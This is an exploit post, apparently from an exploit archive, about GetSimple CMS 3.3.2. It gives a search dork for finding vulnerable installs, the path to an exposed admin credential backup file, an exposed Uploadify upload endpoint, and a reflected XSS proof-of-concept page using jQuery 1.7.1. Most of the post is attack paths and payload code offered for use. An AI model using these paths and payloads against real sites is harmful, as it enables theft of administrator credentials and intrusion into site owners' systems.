facebook facebook twitter rss

GetSimpleCMS_3.3.2 multi Vulnerability

Author: indoushka , Published: 25-10-2014
GetSimpleCMS_3.3.2 multi Vulnerability
==========================================
Author : indoushka
Vondor : http://get-simple.info/
Dork: © 2009-2014 GetSimple CMS – Version 3.3.2
==================================================

info :

http://127.0.0.1/GetSimpleCMS/backups/users/admin.xml.bak

upload :

http://127.0.0.1/GetSimpleCMS/admin/template/js/uploadify/uploadify.swf

XSS Reflected - Jquery v1.7.1 :

<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery v1.7.1 </title>
<script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>


<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery v1.7.1 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
</select>
</p>
</form>
</body>
</html>

Like us on Facebook :